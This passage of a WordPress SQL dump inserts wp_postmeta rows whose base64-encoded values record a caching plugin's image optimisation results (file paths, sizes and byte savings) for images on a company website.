xNlwvMDhcL0lNR18xMjU1MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTQ2MywiaWQiOjk1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NTEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk0NjYsImlkIjo5NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk0NzAsImlkIjo5NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDcyLCJpZCI6OTUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU1MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTQ3NSwiaWQiOjk1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NTEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk0NzcsImlkIjo5NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDgwLCJpZCI6OTUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoyNDQsInRpbWUiOjE0ODM1Nzk0ODMsImlkIjo5NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NTEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NTEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NTEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjE5NiwidGltZSI6MTQ4MzU3OTQ4NiwiaWQiOjk1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU1MS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTQ4OCwiaWQiOjk1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU1MS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTQ5MSwiaWQiOjk1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU1MS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTQ5MywiaWQiOjk1MX1d'); 
INSERT INTO `wp_postmeta` VALUES (29882, 950, 'wpfc_optimisation_reduction', '2455585'); 
INSERT INTO `wp_postmeta` VALUES (29883, 950, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NjEuanBnIiwicmVkdWN0aW9uIjoyNDU1MTY4LCJ0aW1lIjoxNDgzNTc5NTA1LCJpZCI6Ijk1MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTA4LCJpZCI6OTUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTUxMSwiaWQiOjk1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NjEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk1MTQsImlkIjo5NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk1MTcsImlkIjo5NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTIwLCJpZCI6OTUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTUyMiwiaWQiOjk1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk1MjUsImlkIjo5NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTI4LCJpZCI6OTUwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxODksInRpbWUiOjE0ODM1Nzk1MzAsImlkIjo5NTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjIxNywidGltZSI6MTQ4MzU3OTUzMywiaWQiOjk1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTUzNiwiaWQiOjk1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTUzOCwiaWQiOjk1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTU0MSwiaWQiOjk1MH1d'); 
INSERT INTO `wp_postmeta` VALUES (29884, 947, 'wpfc_optimisation_reduction', '2254893'); 
INSERT INTO `wp_postmeta` VALUES (29885, 947, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMuanBnIiwid2lkdGgiOjUxNTIsImhlaWdodCI6MzI2NCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMuanBnIiwicmVkdWN0aW9uIjoyMjU0ODgwLCJ0aW1lIjoxNDgzNTc5NTUzLCJpZCI6Ijk0NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NTU1LCJpZCI6OTQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tTm92b2xhYy1yZXNpbnMtODAweDUwNy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUwNywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTgwMHg1MDcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRc